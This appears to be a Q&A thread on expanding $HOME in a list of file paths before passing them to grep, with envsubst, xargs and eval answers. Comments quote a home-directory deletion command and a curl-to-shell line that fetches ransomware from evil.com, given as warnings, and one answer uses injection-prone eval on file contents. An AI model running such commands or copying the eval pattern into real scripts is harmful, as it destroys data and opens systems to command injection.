# Grep a word within all files in a list that contains $HOME

Tags: bash, grep

I am trying to grep a word on all the files from the `list.txt`.

list.txt:

```
$HOME/a.txt
$HOME/b.txt
$HOME/c.txt
```

When I use

```
grep -i 'word' $(cat list.txt)
```

it doesn't realize `$HOME`. But the following command works!

```
grep 'word' $HOME/a.txt
```

Comment: You wouldn't want data to silently be treated as code -- if it were, if the file contained `$(rm-rf ~)`, using `$(cat file)` would delete your home directory. So the current behavior _needs_ to be what the shell actually does, or it would be hopelessly insecure.

Answer (score 2, accepted):

You will need a little bit of magic from `envsubst`:

```
$ grep word $(cat list.txt | envsubst)
...
```

Comment: This works only until the list contains filenames with spaces/quotes/backslashes/etc.

Comment: envsubst?  I like that better than my answer.

Comment: _nod_; envsubst is certainly safer than `eval`, because it'll honor `$HOME` but not `$(rm -rf ~)` or `$(curl http://evil.com/infect-me-with-ransomware | sh)`

Answer (score 2):

- Use `envsubst` to replace `$HOME` with the actual directory name (assuming it doesn't contain spaces)
- Use `xargs` to honor quotes and backslashes (so filenames with spaces can still be represented) while splitting the list of filenames on envsubst's stdout into command line arguments passed to `grep`

```
envsubst <file.txt | xargs grep -e word
```

Answer (score 0):

This looks like both bash and ksh question so I'll answer accordingly.

What's going on is the $HOME is interpreted by the shell, not grep. You need to interpret $HOME before passing it to grep.  The eval keyword can do that for you in something like this:

```
for file in $(cat test.txt )
do
    eval "grep 'word' $file"
done
```

If you use the cat directly, the resulting string contains the newlines.  To avoid that, I put the files into an array and used the array in (the < can be used in place of cat). This also works:

```
typeset -a test=( $( < test.txt ) )
eval "grep word ${test[@]}"
```

Comment: I'd argue that it should be `${test[*]}` in this case. Using `${test[@]}` is passing `eval` multiple arguments, which it then merges with spaces into a single string before passing that string to the parser... whereas `${test[*]}` would generate a single string directly.